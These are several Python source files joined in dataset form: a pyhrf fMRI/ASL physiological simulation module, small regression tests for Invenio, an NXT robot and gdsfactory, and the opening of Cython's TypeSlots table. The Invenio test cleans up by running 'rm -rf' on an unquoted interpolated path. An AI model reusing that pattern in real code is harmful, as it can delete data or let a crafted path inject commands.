from pyhrf.tools import Pipeline
import pyhrf.boldsynth.scenarios as simbase
PHY_PARAMS_FRISTON00 = {
'model_name' : 'Friston00',
'tau_s' : 1/.8,
'eps' : .5,
'eps_max': 10., #TODO: check this
'tau_m' : 1.,
'tau_f' : 1/.4,
'alpha_w' : .2,
'E0' : .8,
'V0' : .02,
'k1' : 7 * .8,
'k2' : 2.,
'k3' : 2 * .8 - .2}
PHY_PARAMS_FMRII = {
'model_name' : 'fmrii',
'tau_s' : 1/.65,
'eps' : 1.,
'eps_max': 10., #TODO: check this
'tau_m' : .98,
'tau_f' : 1/.41,
'alpha_w' : .5,
'E0' : .4,
'V0' : .01,}
PHY_PARAMS_KHALIDOV11 = {
'model_name' : 'Khalidov11',
'tau_s' : 1.54,
'eps' : .54,
'eps_max': 10., #TODO: check this
'tau_m' : 0.98,
'tau_f' : 2.46,
'alpha_w' : .33,
'E0' : .34,
'V0' : 1,
'k1' : 7 * .34,
'k2' : 2.,
'k3' : 2 * .34 - .2}
#TODO: Donnet, Deuneux
from scipy.stats import truncnorm
def create_tbg_neural_efficacies(physiological_params, condition_defs, labels):
"""
Create neural efficacies from a truncated bi-Gaussian mixture.
Ars:
- physiological_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- condition_defs (list of pyhrf.Condition):
list of condition definitions. Each item should have the following
fields (moments of the mixture):
- m_act (0<=float<eff_max): mean of activating component
- v_act (0<float): variance of activating component
- v_inact (0<float): variance of non-activating component
- labels (np.array((nb_cond, nb_vox), int)): binary activation states
Return:
np.array(np.array((nb_cond, nb_vox), float))
-> the generated neural efficacies
TODO: settle how to relate brls and prls to neural efficacies
"""
eff_max = physiological_params['eps_max']
eff = []
for ic,c in enumerate(condition_defs):
labels_c = labels[ic]
mask_activ = np.where(labels_c)
eff_c = truncnorm.rvs(0, eff_max, loc=0., scale=c.v_inact**.5,
size=labels_c.size)
# truncnorm -> loc is mean, scale is std_dev
eff_c[mask_activ] = truncnorm.rvs(0, eff_max, loc=c.m_act,
scale=c.v_act**.5, size=labels_c.sum())
eff.append(eff_c)
return np.vstack(eff)
def phy_integrate_euler(phy_params, tstep, stim, epsilon, Y0=None):
"""
Integrate the ODFs of the physiological model with the Euler method.
Args:
- phy_params (dict (<param_name> : <param_value>):
parameters of the physiological model
- tstep (float): time step of the integration, in seconds.
- stim (np.array(nb_steps, float)): stimulation sequence with a temporal
resolution equal to the time step of the integration
- epsilon (float): neural efficacy
- Y0 (np.array(4, float) | None): initial values for the physiological
signals.
If None: [0, 1, 1, 1.]
s f_in q v
Result:
- np.array((4, nb_steps), float)
-> the integrated physiological signals, where indexes of the first
axis correspond to:
0 : flow inducing
1 : inflow
2 : HbR
3 : blood volume
TODO: should the output signals be rescaled wrt their value at rest?
"""
tau_s = phy_params['tau_s']
tau_f = phy_params['tau_f']
tau_m = phy_params['tau_m']
alpha_w = phy_params['alpha_w']
E0 = phy_params['E0']
def cpt_phy_model_deriv(y, s, epsi, dest):
N, f_in, v, q = y
if f_in < 0.:
#raise Exception('Negative f_in (%f) at t=%f' %(f_in, ti))
#HACK
print 'Warning: Negative f_in (%f) at t=%f' %(f_in, ti)
f_in = 1e-4
dest[0] = epsi*s - (N/tau_s)-((f_in - 1)/tau_f) #dNdt
dest[1] = N #dfidt
dest[2] = (1/tau_m)*(f_in-v**(1/alpha_w)) #dvdt
dest[3] = (1/tau_m)*((f_in/E0)*(1-(1-E0)**(1/f_in)) - \
(q/v)*(v**(1/alpha_w))) #dqdt
return dest
res = np.zeros((stim.size+1,4))
res[0,:] = Y0 or np.array([0., 1., 1., 1.])
for ti in xrange(1, stim.size+1):
cpt_phy_model_deriv(res[ti-1], stim[ti-1], epsilon, dest=res[ti])
res[ti] *= tstep
res[ti] += res[ti-1]
return res[1:,:].T
def create_evoked_physio_signals(physiological_params, paradigm,
neural_efficacies, dt, integration_step=.05):
"""
Generate evoked hemodynamics signals by integrating a physiological model.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- paradigm (pyhrf.paradigm.Paradigm) :
the experimental paradigm
- neural_efficacies (np.ndarray (nb_conditions, nb_voxels, float)):
neural efficacies involved in flow inducing signal.
- dt (float):
temporal resolution of the output signals, in second
- integration_step (float):
time step used for integration, in second
Returns:
- np.array((nb_signals, nb_scans, nb_voxels), float)
-> All generated signals, indexes of the first axis correspond to:
- 0: flow inducing
- 1: inflow
- 2: blood volume
- 3: [HbR]
"""
#TODO: handle multiple conditions
# -> create input activity signal [0, 0, eff_c1, eff_c1, 0, 0, eff_c2, ...]
# for now, take only first condition
first_cond = paradigm.get_stimulus_names()[0]
stim = paradigm.get_rastered(integration_step)[first_cond][0]
neural_efficacies = neural_efficacies[0]
# response matrix intialization
integrated_vars = np.zeros((4, neural_efficacies.shape[0], stim.shape[0]))
for i, epsilon in enumerate(neural_efficacies):
integrated_vars[:,i,:] = phy_integrate_euler(physiological_params,
integration_step, stim,
epsilon)
#downsampling:
nb_scans = paradigm.get_rastered(dt)[first_cond][0].size
dsf = int(dt/integration_step)
return np.swapaxes(integrated_vars[:,:,::dsf][:,:,:nb_scans], 1, 2)
def create_bold_from_hbr_and_cbv(physiological_params, hbr, cbv):
"""
Compute BOLD signal from HbR and blood volume variations obtained
by a physiological model
"""
# physiological parameters
V0 = physiological_params['V0']
k1 = physiological_params['k1']
k2 = physiological_params['k2']
k3 = physiological_params['k3']
return V0 *( k1*(1-hbr) + k2*(1-hbr/cbv) + k3*(1-cbv) )
def create_physio_brf(physiological_params, response_dt=.5,
response_duration=25.,return_brf_q_v=False):
"""
Generate a BOLD response function by integrating a physiological model and
setting its driving input signal to a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the BRF (normalized)
- also return brf_not_normalized, q, v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]})
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
brf = create_bold_from_hbr_and_cbv(physiological_params, q[:,0], v[:,0])
if return_brf_q_v:
return brf/ (brf**2).sum()**.5, q, v
else:
return brf / (brf**2).sum()**.5
def create_physio_prf(physiological_params, response_dt=.5,
response_duration=25.,return_prf_q_v=False):
"""
Generate a perfusion response function by setting the input driving signal
of the given physiological model with a single impulse.
Args:
- physiological_params (dict (<pname (str)> : <pvalue (float)>)):
parameters of the physiological model.
In jde.sandbox.physio see PHY_PARAMS_FRISTON00, PHY_PARAMS_FMRII ...
- response_dt (float): temporal resolution of the response, in second
- response_duration (float): duration of the response, in second
Return:
- np.array(nb_time_coeffs, float)
-> the PRF
- also return brf_not_normalized, q, v when return_prf_q_v=True
(for error checking of v and q generation in calc_hrfs)
"""
p = Paradigm({'c':[np.array([0.])]}, [response_duration+response_dt],
{'c':[np.array([1.])]}) # response_dt to match convention
# in JDE analysis
n = np.array([[1.]])
s,f,v,q = create_evoked_physio_signals(physiological_params, p, n,
response_dt)
prf = f[:,0] - f[0,0] #remove y-intercept
if return_prf_q_v:
return prf/ (prf**2).sum()**.5, q, v
else:
return prf / (prf**2).sum()**.5
def rescale_bold_over_perf(bold_stim_induced, perf_stim_induced,
bold_perf_ratio=5.):
return bold_stim_induced/bold_stim_induced.max() * bold_perf_ratio * \
perf_stim_induced.max()
def create_asl_from_stim_induced(bold_stim_induced_rescaled, perf_stim_induced,
ctrl_tag_mat, dsf, perf_baseline, noise,
drift=None, outliers=None):
"""
Downsample stim_induced signal according to downsampling factor 'dsf' and
add noise and drift (nuisance signals) which has to be at downsampled
temporal resolution.
"""
bold = bold_stim_induced_rescaled[0:-1:dsf,:].copy()
perf = np.dot(ctrl_tag_mat, (perf_stim_induced[0:-1:dsf,:].copy() + \
perf_baseline))
asl = bold + perf
if drift is not None:
asl += drift
if outliers is not None:
asl += outliers
asl += noise
return asl
def simulate_asl_full_physio(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data by integrating a physiological dynamical system.
Ags:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
TODO: use magnetization model to properly simulate final ASL signal
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', m_act=10., v_act=.1, v_inact=.2,
label_map=lmap1),
Condition(name='video', m_act=11., v_act=.11, v_inact=.21,
label_map=lmap2),
Condition(name='damier', m_act=12., v_act=.12, v_inact=.22,
label_map=lmap3),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap1),
Condition(name='video', m_act=1.6, v_act=.3, v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Neural efficacy
'neural_efficacies' : create_tbg_neural_efficacies,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Physiological model
'physiological_params' : PHY_PARAMS_FRISTON00,
('flow_induction','perf_stim_induced','cbv','hbr') :
create_evoked_physio_signals,
'bold_stim_induced' : create_bold_from_hbr_and_cbv,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs': simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# ASL
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
# Perf baseline #should be the inflow at rest ... #TODO
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 0.,
'perf_baseline_var': 0.,
# maybe rename to ASL (should be also modified in JDE)#TODO
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
def simulate_asl_physio_rfs(output_dir=None, noise_scenario='high_snr',
spatial_size='tiny'):
"""
Generate ASL data according to a LTI system, with PRF and BRF generated
from a physiological model.
Args:
- output_dir (str|None): path where to save outputs as nifti files.
If None: no output files
- noise_scenario ("high_snr"|"low_snr"): scenario defining the SNR
- spatial_size ("tiny"|"normal") : scenario for the size of the map
- "tiny" produces 2x2 maps
- "normal" produces 20x20 maps
Result:
dict (<item_label (str)> : <simulated_item (np.ndarray)>)
-> a dictionary mapping names of simulated items to their values
WARNING: in this dict the 'bold' item is in fact the ASL signal.
This name was used to be compatible with JDE which assumes
that the functional time series is named "bold".
TODO: rather use the more generic label 'fmri_signal'.
"""
drift_var = 10.
dt = .5
dsf = 2 #down sampling factor
if spatial_size == 'tiny':
lmap1, lmap2, lmap3 = 'tiny_1', 'tiny_2', 'tiny_3'
elif spatial_size == 'random_small':
lmap1, lmap2, lmap3 = 'random_small', 'random_small', 'random_small'
else:
lmap1, lmap2, lmap3 = 'icassp13', 'ghost', 'house_sun'
if noise_scenario == 'high_snr':
v_noise = 0.05
conditions = [
Condition(name='audio', perf_m_act=5., perf_v_act=.1, perf_v_inact=.2,
bold_m_act=15., bold_v_act=.1, bold_v_inact=.2,
label_map=lmap1),
Condition(name='video', perf_m_act=5., perf_v_act=.11, perf_v_inact=.21,
bold_m_act=14., bold_v_act=.11, bold_v_inact=.21,
label_map=lmap2),
Condition(name='damier', perf_m_act=12.,
perf_v_act=.12, perf_v_inact=.22,
bold_m_act=20., bold_v_act=.12, bold_v_inact=.22,
label_map=lmap3),
]
elif noise_scenario == 'low_snr_low_prl':
v_noise = 7.
scale = .3
print 'noise_scenario: low_snr_low_prl'
conditions = [
Condition(name='audio', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6*scale, perf_v_act=.1,
perf_v_inact=.1,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
else: #low_snr
v_noise = 2.
conditions = [
Condition(name='audio', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap1),
Condition(name='video', perf_m_act=1.6, perf_v_act=.3,
perf_v_inact=.3,
bold_m_act=2.2, bold_v_act=.3, bold_v_inact=.3,
label_map=lmap2),
]
simulation_steps = {
'dt' : dt,
'dsf' : dsf,
'tr' : dt * dsf,
'condition_defs' : conditions,
# Paradigm
'paradigm' : simbase.create_localizer_paradigm_avd,
'rastered_paradigm' : simbase.rasterize_paradigm,
# Labels
'labels_vol' : simbase.create_labels_vol,
'labels' : simbase.flatten_labels_vol,
'nb_voxels': lambda labels: labels.shape[1],
# Physiological model (for generation of RFs)
'physiological_params' : PHY_PARAMS_FRISTON00,
# Brls
'brls' : simbase.create_time_invariant_gaussian_brls,
# Prls
'prls' : simbase.create_time_invariant_gaussian_prls,
# BRF
'primary_brf' : create_physio_brf,
'brf' : simbase.duplicate_brf,
# PRF
'primary_prf' : create_physio_prf,
'prf' : simbase.duplicate_prf,
# Perf baseline
'perf_baseline' : simbase.create_perf_baseline,
'perf_baseline_mean' : 1.5,
'perf_baseline_var': .4,
# Stim induced
'bold_stim_induced' : simbase.create_bold_stim_induced_signal,
'perf_stim_induced' : simbase.create_perf_stim_induced_signal,
# Noise
'v_gnoise' : v_noise,
'noise' : simbase.create_gaussian_noise_asl,
# Drift
'drift_order' : 4,
'drift_var' : drift_var,
'drift_coeffs':simbase.create_drift_coeffs_asl,
'drift' : simbase.create_polynomial_drift_from_coeffs_asl,
# Bold # maybe rename as ASL (should be handled afterwards ...
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
#### Linearized system to characterize BRF - PRF relationship ####
# def buildOrder1FiniteDiffMatrix_central_alternate(size,dt):
# """
# returns a toeplitz matrix
# for central differences
# """
# #instability in the first few data points when calculating prf (not seen when old form is used)
# from scipy.linalg import toeplitz
# r = np.zeros(size)
# c = np.zeros(size)
# r[1] = .5
# r[size-1] = -.5
# c[1] = -.5
# c[size-1] = .5
# # to fix the last grid point
# D = toeplitz(r,c).T
# D[0,size-1]=0
# D[size-1,0]=0
# D[size-1,size-2]=-1
# D[size-1,size-1]=1
# return D/(2*dt)
def buildOrder1FiniteDiffMatrix_central(size,dt):
"""
returns a toeplitz matrix
for central differences
to correct for errors on the first and last points:
(due to the fact that there is no rf[-1] or rf[size] to average with)
- uses the last point to calcuate the first and vis-versa
- this is acceptable bc the rf is assumed to begin & end at steady state
(thus the first and last points should both be zero)
"""
from scipy.linalg import toeplitz
r = np.zeros(size)
c = np.zeros(size)
r[1] = .5
r[size-1] = -.5
c[1] = -.5
c[size-1] = .5
return toeplitz(r,c).T/(2*dt)
def plot_calc_hrf(hrf1_simu, hrf1_simu_name, hrf1_calc, hrf1_calc_name,
hrf2_simu, hrf2_simu_name, dt):
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(hrf1_simu.size) * dt #TODO: find non-dt method to do this
simu1 = plt.plot(t, hrf1_simu, label=hrf1_simu_name)
calc1 = plt.plot(t, hrf1_calc, label=hrf1_calc_name)
plt.legend()
plt.title(hrf1_calc_name)
plt.subplot(122)
simu2 = plt.plot(t, hrf2_simu, label=hrf2_simu_name)
plt.plot(t, hrf1_simu, label=hrf1_simu_name)
plt.legend()
plt.title(hrf2_simu_name)
plt.show()
return None
def linear_rf_operator(rf_size, phy_params, dt, calculating_brf=False):
"""
Calculates the linear operator A needed to convert brf to prf & vis-versa
prf = (A^{-1})brf
brf = (A)prf
Inputs:
- size of the prf and/or brf (assumed to be same)
- physiological parameters
- time resolution of data:
- if you wish to calculate brf (return A), or prf (return inverse of A)
Outputs:
- np.array of size (hrf_size,1) linear operator to convert hrfs
"""
import numpy as np
tau_m_inv = 1./phy_params['tau_m']
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
from pyhrf.sandbox.physio import buildOrder1FiniteDiffMatrix_central
D = buildOrder1FiniteDiffMatrix_central(rf_size,dt) #numpy matrix
eye = np.matrix(np.eye(rf_size)) #numpy matrix
A3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*eye).I )
A4 = c * (D+tau_m_inv*eye).I - (D+tau_m_inv*eye).I*((1-alpha_w)*alpha_w_inv* tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*eye).I
A = V0 * ( (k1+k2)*A4 + (k3-k2)* A3 )
if (calculating_brf):
return -A.A
else: #calculating_prf
return -(A.I).A
def calc_linear_rfs(simu_brf, simu_prf, phy_params, dt, normalized_rfs=True):
"""
Calculate 'prf given brf' and 'brf given prf' based on the a linearization
around steady state of the physiological model as described in Friston 2000.
Input:
- simu_brf, simu_prf: brf and prf from the physiological simulation
from which you wish to calculate the respective
prf and brf.
Assumed to be of size (1,hrf.size)
- phy_params
- normalized_rfs: set to True if simu_hrfs are normalized
Output:
- calc_brf, calc_prf: np.arrays of shape (hrf.size, 1)
- q_linear, v_linear: q and v calculated according to the linearized model
Note:
These calculations do not account for any rescaling between brf and prf.
This means the input simu_brf, simu_prf should NOT be rescaled.
** Warning**:
- this function assumes prf.size == brf.size and uses this to build D, I
- if making modifications:
calc_brf, calc_prf have a truncation error (due to the finite difference matrix used) on the order of O(dt)^2. If for any reason a hack is later implemented to set the y-intecepts of brf_calc, prf_calc to zero by
setting the first row of X4, X3 = 0, this will raise a singular matrix
error in the calculation of calc_prf (due to X.I command), so this error is helpful in this case
"""
D = buildOrder1FiniteDiffMatrix_central(simu_prf.size,dt) #numpy matrix
I = np.matrix(np.eye(simu_prf.size)) #numpy matrix
#TODO: elimlinate prf.size dependency
tau_m = phy_params['tau_m']
tau_m_inv = 1./tau_m #when tau_m=1, singular matrix formed by (D+tau_m_inv*I)
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
#transform to (hrf.size,1) matrix for calcs
simu_prf = np.matrix(simu_prf).transpose()
simu_brf = np.matrix(simu_brf).transpose()
X3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*I).I )
X4= c *(D+tau_m_inv*I).I - (D+tau_m_inv*I).I*((1-alpha_w)*alpha_w_inv*\
tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*I).I
X = V0 * ( (k1+k2)*X4 + (k3-k2)* X3 )
#for error checking
q_linear = 1-X4*(-simu_prf)
v_linear = 1-X3*(-simu_prf)
calc_brf = X*(-simu_prf)
calc_prf = -X.I*simu_brf
#convert to np.arrays
calc_prf = calc_prf.A
calc_brf = calc_brf.A
q_linear = q_linear.A
v_linear = v_linear.A
if normalized_rfs:
calc_prf /= (calc_prf**2).sum()**.5
calc_brf /= (calc_brf**2).sum()**.5
return calc_brf, calc_prf, q_linear, v_linear
def run_calc_linear_rfs():
"""
Choose physio parameters
Choose to generate simu_rfs from multiple or single stimulus
TODO:
- figure out why there is an issue that perf_stim_induced is much greater than bold_stim_induced
- figure out why when simu_brf=bold_stim_induced_rescaled,
calc_brf is so small it appears to be 0
"""
phy_params = PHY_PARAMS_FRISTON00
#phy_params = PHY_PARAMS_KHALIDOV11
multiple_stimulus_rf=False #to test calculations using a single stimulus rf
#else, tests on a single stimulus rf
if multiple_stimulus_rf:
simu_items = simulate_asl_full_physio()
#for rfs, rows are rfs, columns are different instances
choose_rf = 1 # choose any number between 0 and simu_rf.shape[1]
simu_prf = simu_items['perf_stim_induced'][:,choose_rf].T - \
simu_items['perf_stim_induced'][0,choose_rf]
simu_brf = simu_items['bold_stim_induced'][:,choose_rf].T
dt = simu_items['dt']
q_dynamic = simu_items['hbr'][:,choose_rf]
v_dynamic = simu_items['cbv'][:,choose_rf]
normalized_rfs = False
# if normalized simulated brfs and prfs are being used, then the comparison between v and q, linear and dynamic, is no longer valid. Disregard the plot.
else:
dt = .05
duration = 25.
simu_prf, q_unused, v_unused = create_physio_prf(phy_params,
response_dt=dt, response_duration=duration,
return_prf_q_v=True)
simu_brf, q_dynamic, v_dynamic = create_physio_brf(phy_params,
response_dt=dt, response_duration=duration,
return_brf_q_v=True)
normalized_rfs = True
## deletable - no use for rescaling here
#rescaling irrelevant to this simulation
#simu_brf_rescale = rescale_bold_over_perf(simu_brf, simu_prf)
#simu_brf = simu_brf_rescale
#in testing: assert( simu_brf.shape == simu_prf_shape)?
##
calc_brf, calc_prf, q_linear, v_linear = calc_linear_rfs(simu_brf, simu_prf,
phy_params, dt,
normalized_rfs)
plot_results=True
if plot_results:
plot_calc_hrf(simu_brf, 'simulated brf', calc_brf, 'calculated brf',
simu_prf, 'simulated prf', dt)
plot_calc_hrf(simu_prf, 'simulated prf', calc_prf, 'calculated prf',
simu_brf, 'simulated brf', dt)
#for debugging
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(v_linear.size) * dt #TODO: find non-dt method to do this
plt.plot(t,v_linear, label='v linear')
plt.plot(t, v_dynamic, label='v dynamic')
plt.legend()
plt.title('v')
plt.subplot(122)
plt.plot(t,q_linear, label='q linear')
plt.plot(t, q_dynamic, label='q dynamic')
plt.legend()
plt.title('q')
plt.show()
# to see calc_brf and calc_prf on same plot (if calculating both)
plt.figure()
plt.plot(t, calc_brf, label='calculated brf')
plt.plot(t, calc_prf, label='calculated prf')
plt.legend()
plt.title('calculated hrfs')
return None
| gpl-3.0 | 5,536,194,127,172,453,000 | 35.581423 | 235 | 0.563246 | false |
labordoc/labordoc-next | modules/miscutil/lib/plotextractor_regression_tests.py | 1 | 2132 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Regression tests for the plotextract script."""
__revision__ = "$Id$"
import os
from invenio.config import CFG_TMPDIR, CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite, InvenioTestCase
class GetDefaultsTest(InvenioTestCase):
"""Test function to get default values."""
def setUp(self):
self.arXiv_id = "arXiv:astro-ph_0104076"
self.tarball = "%s/2001/04/arXiv:astro-ph_0104076/arXiv:astro-ph_0104076" % (CFG_TMPDIR,)
def test_get_defaults(self):
"""plotextractor - get defaults"""
from invenio.shellutils import run_shell_command
from invenio.plotextractor import get_defaults
sdir_should_be = os.path.join(CFG_TMPDIR, self.arXiv_id + '_plots')
refno_should_be = "15" # Note: For ATLANTIS DEMO site
sdir, refno = get_defaults(tarball=self.tarball, sdir=None, refno_url=CFG_SITE_URL)
if sdir != None:
run_shell_command("rm -rf %s" % (sdir,))
self.assertTrue(sdir == sdir_should_be, \
"didn\'t get correct default scratch dir")
self.assertTrue(refno == refno_should_be, \
'didn\'t get correct default reference number')
TEST_SUITE = make_test_suite(GetDefaultsTest)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
| gpl-2.0 | 5,976,011,825,349,743,000 | 39.226415 | 97 | 0.675422 | false |
snim2/nxt-turtle | tests/test-sensors.py | 1 | 1224 | """
Test the sensors on the Lego NXT.
Copyright (C) Sarah Mount, 2008.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import nxt_turtle
__author__ = 'Sarah Mount <[email protected]>'
__date__ = 'March 2008'
if __name__ == '__main__':
turtle = nxt_turtle.LegoTurtle()
print 'Sound level: ', turtle.get_sound()
print 'Light level: ', turtle.get_light()
print 'UltraSound level:', turtle.get_ultrasound()
if turtle.get_touch():
print 'Touch sensor: On'
else: print 'Touch sensor: Off'
turtle.close()
| gpl-2.0 | -2,247,795,392,501,042,400 | 33 | 78 | 0.694444 | false |
gdsfactory/gdsfactory | pp/drc/test_width.py | 1 | 1250 | from typing import Tuple
import pp
from pp.drc import check_width
def test_wmin_failing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 + 10 # component edges are smaller than min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# r = check_width(gdspath, min_width=min_width, layer=layer)
# print(check_width(gdspath, min_width=min_width, layer=layer))
assert check_width(gdspath, min_width=min_width, layer=layer) == 2
assert check_width(c, min_width=min_width, layer=layer) == 2
def test_wmin_passing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 - 10 # component edges are bigger than the min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# print(check_width(c, min_width=min_width, layer=layer))
# assert check_width(gdspath, min_width=min_width, layer=layer) is None
# assert check_width(c, min_width=min_width, layer=layer) is None
assert check_width(gdspath, min_width=min_width, layer=layer) == 0
assert check_width(c, min_width=min_width, layer=layer) == 0
if __name__ == "__main__":
# test_wmin_failing()
test_wmin_passing()
| mit | 7,011,641,545,974,468,000 | 35.764706 | 75 | 0.6608 | false |
rguillebert/CythonCTypesBackend | Cython/Compiler/TypeSlots.py | 1 | 30865 | #
# Tables describing slots in the CPython type object
# and associated know-how.
#
import Naming
import PyrexTypes
import StringEncoding
invisible = ['__cinit__', '__dealloc__', '__richcmp__',
'__nonzero__', '__bool__']
class Signature(object):
# Method slot signature descriptor.
#
# has_dummy_arg boolean
# has_generic_args boolean
# fixed_arg_format string
# ret_format string
# error_value string
#
# The formats are strings made up of the following
# characters:
#
# 'O' Python object
# 'T' Python object of the type of 'self'
# 'v' void
# 'p' void *
# 'P' void **
# 'i' int
# 'b' bint
# 'I' int *
# 'l' long
# 'f' float
# 'd' double
# 'h' Py_hash_t
# 'z' Py_ssize_t
# 'Z' Py_ssize_t *
# 's' char *
# 'S' char **
# 'r' int used only to signal exception
# 'B' Py_buffer *
# '-' dummy 'self' argument (not used)
# '*' rest of args passed as generic Python
# arg tuple and kw dict (must be last
# char in format string)
format_map = {
'O': PyrexTypes.py_object_type,
'v': PyrexTypes.c_void_type,
'p': PyrexTypes.c_void_ptr_type,
'P': PyrexTypes.c_void_ptr_ptr_type,
'i': PyrexTypes.c_int_type,
'b': PyrexTypes.c_bint_type,
'I': PyrexTypes.c_int_ptr_type,
'l': PyrexTypes.c_long_type,
'f': PyrexTypes.c_float_type,
'd': PyrexTypes.c_double_type,
'h': PyrexTypes.c_py_hash_t_type,
'z': PyrexTypes.c_py_ssize_t_type,
'Z': PyrexTypes.c_py_ssize_t_ptr_type,
's': PyrexTypes.c_char_ptr_type,
'S': PyrexTypes.c_char_ptr_ptr_type,
